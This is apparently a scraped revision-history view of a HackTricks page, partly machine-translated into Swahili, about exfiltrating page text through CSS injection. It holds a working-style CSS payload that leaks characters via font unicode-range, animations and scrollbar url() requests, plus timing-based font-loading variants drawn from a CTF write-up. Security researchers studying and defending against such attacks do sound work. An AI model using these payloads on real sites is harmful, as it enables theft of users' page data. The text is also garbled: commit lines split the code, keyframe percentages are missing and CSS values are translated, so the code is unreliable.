											2022-04-05 22:03:49 +00:00
+								```css
 								/* comic sans is high (lol) and causes a vertical overflow */
 								@font-face{font-family:has_A;src:local('Comic Sans MS');unicode-range:U+41;font-style:monospace;}
 								@font-face{font-family:has_B;src:local('Comic Sans MS');unicode-range:U+42;font-style:monospace;}
 								@font-face{font-family:has_C;src:local('Comic Sans MS');unicode-range:U+43;font-style:monospace;}
 								@font-face{font-family:has_D;src:local('Comic Sans MS');unicode-range:U+44;font-style:monospace;}
 								@font-face{font-family:has_E;src:local('Comic Sans MS');unicode-range:U+45;font-style:monospace;}
 								@font-face{font-family:has_F;src:local('Comic Sans MS');unicode-range:U+46;font-style:monospace;}
 								@font-face{font-family:has_G;src:local('Comic Sans MS');unicode-range:U+47;font-style:monospace;}
 								@font-face{font-family:has_H;src:local('Comic Sans MS');unicode-range:U+48;font-style:monospace;}
 								@font-face{font-family:has_I;src:local('Comic Sans MS');unicode-range:U+49;font-style:monospace;}
 								@font-face{font-family:has_J;src:local('Comic Sans MS');unicode-range:U+4a;font-style:monospace;}
 								@font-face{font-family:has_K;src:local('Comic Sans MS');unicode-range:U+4b;font-style:monospace;}
 								@font-face{font-family:has_L;src:local('Comic Sans MS');unicode-range:U+4c;font-style:monospace;}
 								@font-face{font-family:has_M;src:local('Comic Sans MS');unicode-range:U+4d;font-style:monospace;}
 								@font-face{font-family:has_N;src:local('Comic Sans MS');unicode-range:U+4e;font-style:monospace;}
 								@font-face{font-family:has_O;src:local('Comic Sans MS');unicode-range:U+4f;font-style:monospace;}
 								@font-face{font-family:has_P;src:local('Comic Sans MS');unicode-range:U+50;font-style:monospace;}
 								@font-face{font-family:has_Q;src:local('Comic Sans MS');unicode-range:U+51;font-style:monospace;}
 								@font-face{font-family:has_R;src:local('Comic Sans MS');unicode-range:U+52;font-style:monospace;}
 								@font-face{font-family:has_S;src:local('Comic Sans MS');unicode-range:U+53;font-style:monospace;}
 								@font-face{font-family:has_T;src:local('Comic Sans MS');unicode-range:U+54;font-style:monospace;}
 								@font-face{font-family:has_U;src:local('Comic Sans MS');unicode-range:U+55;font-style:monospace;}
 								@font-face{font-family:has_V;src:local('Comic Sans MS');unicode-range:U+56;font-style:monospace;}
 								@font-face{font-family:has_W;src:local('Comic Sans MS');unicode-range:U+57;font-style:monospace;}
 								@font-face{font-family:has_X;src:local('Comic Sans MS');unicode-range:U+58;font-style:monospace;}
 								@font-face{font-family:has_Y;src:local('Comic Sans MS');unicode-range:U+59;font-style:monospace;}
 								@font-face{font-family:has_Z;src:local('Comic Sans MS');unicode-range:U+5a;font-style:monospace;}
 								@font-face{font-family:has_0;src:local('Comic Sans MS');unicode-range:U+30;font-style:monospace;}
 								@font-face{font-family:has_1;src:local('Comic Sans MS');unicode-range:U+31;font-style:monospace;}
 								@font-face{font-family:has_2;src:local('Comic Sans MS');unicode-range:U+32;font-style:monospace;}
 								@font-face{font-family:has_3;src:local('Comic Sans MS');unicode-range:U+33;font-style:monospace;}
 								@font-face{font-family:has_4;src:local('Comic Sans MS');unicode-range:U+34;font-style:monospace;}
 								@font-face{font-family:has_5;src:local('Comic Sans MS');unicode-range:U+35;font-style:monospace;}
 								@font-face{font-family:has_6;src:local('Comic Sans MS');unicode-range:U+36;font-style:monospace;}
 								@font-face{font-family:has_7;src:local('Comic Sans MS');unicode-range:U+37;font-style:monospace;}
 								@font-face{font-family:has_8;src:local('Comic Sans MS');unicode-range:U+38;font-style:monospace;}
 								@font-face{font-family:has_9;src:local('Comic Sans MS');unicode-range:U+39;font-style:monospace;}
 								@font-face{font-family:rest;src: local('Courier New');font-style:monospace;unicode-range:U+0-10FFFF}
 								div.leak {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								overflow-y: auto; /* leak channel */
 								overflow-x: hidden; /* remove false positives */
 								height: 40px; /* comic sans capitals exceed this height */
 								font-size: 0px; /* make suffix invisible */
 								letter-spacing: 0px; /* separation */
 								word-break: break-all; /* small width split words in lines */
 								font-family: rest; /* default */
 								background: grey; /* default */
 								width: 0px; /* initial value */
 								animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
 								animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								div.leak::first-line{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								font-size: 30px; /* prefix is visible in first line */
 								text-transform: uppercase; /* only capital letters leak */
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								/* iterate over all chars */
 								@keyframes trychar {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+% { font-family: rest; } /* delay for width change */
 % { font-family: has_A, rest; --leak: url(?a); }
 % { font-family: rest; }
 % { font-family: has_B, rest; --leak: url(?b); }
 % { font-family: rest; }
 % { font-family: has_C, rest; --leak: url(?c); }
 % { font-family: rest }
 % { font-family: has_D, rest; --leak: url(?d); }
 % { font-family: rest; }
 % { font-family: has_E, rest; --leak: url(?e); }
 % { font-family: rest; }
 % { font-family: has_F, rest; --leak: url(?f); }
 % { font-family: rest; }
 % { font-family: has_G, rest; --leak: url(?g); }
 % { font-family: rest; }
 % { font-family: has_H, rest; --leak: url(?h); }
 % { font-family: rest }
 % { font-family: has_I, rest; --leak: url(?i); }
 % { font-family: rest; }
 % { font-family: has_J, rest; --leak: url(?j); }
 % { font-family: rest; }
 % { font-family: has_K, rest; --leak: url(?k); }
 % { font-family: rest; }
 % { font-family: has_L, rest; --leak: url(?l); }
 % { font-family: rest; }
 % { font-family: has_M, rest; --leak: url(?m); }
 % { font-family: rest; }
 % { font-family: has_N, rest; --leak: url(?n); }
 % { font-family: rest; }
 % { font-family: has_O, rest; --leak: url(?o); }
 % { font-family: rest; }
 % { font-family: has_P, rest; --leak: url(?p); }
 % { font-family: rest; }
 % { font-family: has_Q, rest; --leak: url(?q); }
 % { font-family: rest; }
 % { font-family: has_R, rest; --leak: url(?r); }
 % { font-family: rest; }
 % { font-family: has_S, rest; --leak: url(?s); }
 % { font-family: rest; }
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								/* increase width char by char, i.e. add new char to prefix */
 								@keyframes loop {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+% { width: 0px }
 % { width: 20px }
 % { width: 40px }
 % { width: 60px }
 % { width: 80px }
 % { width: 100px }
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								```swahili
 % { upana: 120px }
 % { upana: 140px }
 % { upana: 0px }
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								div::-webkit-scrollbar {
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								background: bluu;
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								/* upande wa channel */
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								div::-webkit-scrollbar:vertical {
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								background: bluu var(--leak);
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								### Uvujaji wa kipengele cha maandishi (III): kuvuja kwa seti ya herufi kwa kutumia muda wa cache (bila kuhitaji mali za nje) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								**Marejeleo:** Hii inatajwa kama [suluhisho lisilofanikiwa katika andiko hili](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Katika kesi hii, tunaweza kujaribu kuvuja ikiwa herufi iko katika maandishi kwa kupakia font bandia kutoka asili ile ile:
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
+								```css
 								@font-face {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								font-family: "A1";
 								src: url(/static/bootstrap.min.css?q=1);
 								unicode-range: U+0041;
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
+								}
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								If there is a match, the **font will be loaded from `/static/bootstrap.min.css?q=1`**. Ingawa haitapakia kwa mafanikio, **kivinjari kinapaswa kukisakinisha**, na hata kama hakuna cache, kuna **muhimu wa 304 isiyobadilishwa**, hivyo **jibu linapaswa kuwa haraka** kuliko mambo mengine.
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Hata hivyo, ikiwa tofauti ya muda kati ya jibu lililosakinishwa na lile lisilosakinishwa si kubwa vya kutosha, hii haitakuwa na manufaa. Kwa mfano, mwandishi alitaja: Hata hivyo, baada ya majaribio, niligundua kuwa tatizo la kwanza ni kwamba kasi si tofauti sana, na tatizo la pili ni kwamba boti hutumia bendera ya `disk-cache-size=1`, ambayo ni ya kufikiria kweli.
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								### Uchimbaji wa nodi ya maandishi (III): kuvuja kwa seti ya herufi kwa kupima kupakia mamia ya "fonti" za ndani (bila kuhitaji mali za nje) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								**Marejeo:** Hii imeelezwa kama [suluhisho lisilofanikiwa katika andiko hili](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Katika kesi hii unaweza kuonyesha **CSS kupakia mamia ya fonti bandia** kutoka asili ile ile wakati kuna mechi inatokea. Kwa njia hii unaweza **kupima muda** unaochukua na kugundua ikiwa herufi inaonekana au la kwa kitu kama:
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
+								```css
 								@font-face {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								font-family: "A1";
 								src: url(/static/bootstrap.min.css?q=1),
 								url(/static/bootstrap.min.css?q=2),
 								....
 								url(/static/bootstrap.min.css?q=500);
 								unicode-range: U+0041;
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
+								}
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Na msimbo wa boti unaonekana kama huu:
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
+								```python
 								browser.get(url)
 								WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
 								time.sleep(30)
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Kwa hivyo, ikiwa herufi hazilingani, wakati wa majibu unapotembelea bot inatarajiwa kuwa takriban sekunde 30. Walakini, ikiwa kuna mechi ya herufi, maombi mengi yatapelekwa kupata herufi, ikisababisha mtandao kuwa na shughuli endelevu. Kama matokeo, itachukua muda mrefu kutimiza hali ya kusimamisha na kupokea majibu. Kwa hivyo, muda wa majibu unaweza kutumika kama kiashiria cha kubaini ikiwa kuna mechi ya herufi.
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								## Marejeo
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
 								* [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
 								* [https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b](https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b)
 								* [https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d](https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d)
 								* [https://x-c3ll.github.io/posts/CSS-Injection-Primitives/](https://x-c3ll.github.io/posts/CSS-Injection-Primitives/)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								**Kikundi cha Usalama cha Kujaribu Kwa Bidii**
 								<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
 								{% embed url="https://discord.gg/tryhardsecurity" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Njia nyingine za kusaidia HackTricks:
-												arte

											
										
										
											2024-01-01 17:15:42 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
 								* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
 								* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 								* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>